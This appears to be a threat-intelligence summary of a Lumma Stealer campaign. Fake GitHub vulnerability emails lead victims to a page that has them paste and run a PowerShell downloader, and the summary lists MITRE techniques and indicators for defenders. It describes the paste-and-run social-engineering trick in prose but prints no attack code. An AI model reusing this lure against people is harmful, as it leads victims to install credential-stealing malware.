Keypoints
- Spoofed emails claim a repository vulnerability and point recipients to a malicious domain (github-scanner.com).
- The landing page instructs users to press Windows+R, Ctrl+V, Enter to paste and execute a JavaScript-supplied PowerShell command.
- The PowerShell script downloads an executable named l6E.exe, which is renamed locally to SysSetup.exe and executed.
- The downloaded payload is identified as Lumma Stealer, designed to exfiltrate login credentials and personal information.
- If C2 domains are unreachable, the malware attempts to retrieve data from Steam community profiles as a fallback (C2 info is encrypted).
- CERT-AGID published IoCs and a downloadable JSON feed for detection and response.
MITRE Techniques
- [T1059.001] PowerShell – Execution of malicious PowerShell code to download and run the payload. Quote: ‘the task of the script is to release the PowerShell code described in the constant captchaText and executed through the subsequent commands: Windows+R, Ctrl+V, and Enter.’
- [T1555.003] Credentials from Web Browsers – Harvesting of stored login credentials and personal data by the stealer. Quote: ‘designed to steal sensitive information from users, including login data and personal information.’
- [T1071.001] Application Layer Protocol: Web Protocols – Communication with command-and-control domains and fallback retrieval via web resources (Steam profiles). Quote: ‘If the malware fails to connect to its list of C2 domains, a routine is activated to obtain information from Steam community profiles.’
Indicators of Compromise
- [Domain] distribution and phishing infrastructure – github-scanner.com
- [File names] payload and local rename – l6E.exe, SysSetup.exe
- [IoC feed] published indicators (JSON) – https://cert-agid.gov.it/wp-content/uploads/2024/09/github-scanner_lumma_18-09-2024.json
- [C2] encrypted command-and-control URLs and fallback via Steam community profiles – encrypted C2 URLs (not listed) and Steam profile retrieval routines
In this campaign, attackers send spoofed emails that impersonate the GitHub Security Team and link to a freshly registered domain (github-scanner.com). The landing page displays a deceptive prompt asking users to press Windows+R, Ctrl+V, and Enter; these keystrokes open the Run dialog, paste a JavaScript-provided payload (stored in a variable named captchaText), and execute it, triggering a PowerShell command.
The executed PowerShell downloads an executable named l6E.exe, renames it locally to SysSetup.exe, and launches it. That executable is Lumma Stealer, which is instrumented to collect stored credentials and sensitive personal information. If initial attempts to reach its list of C2 domains fail, the malware activates a fallback routine that retrieves C2/configuration data from Steam community profiles; the C2 URLs in this campaign are delivered in encrypted form.
For detection and response, CERT-AGID has published the observed indicators and a downloadable IoC JSON feed containing the campaign details and artifacts used in distribution and execution. Read more: https://cert-agid.gov.it/news/lumma-stealer-diffuso-tramite-notifica-di-falsa-vulnerabilita-di-sicurezza-sul-proprio-progetto-github/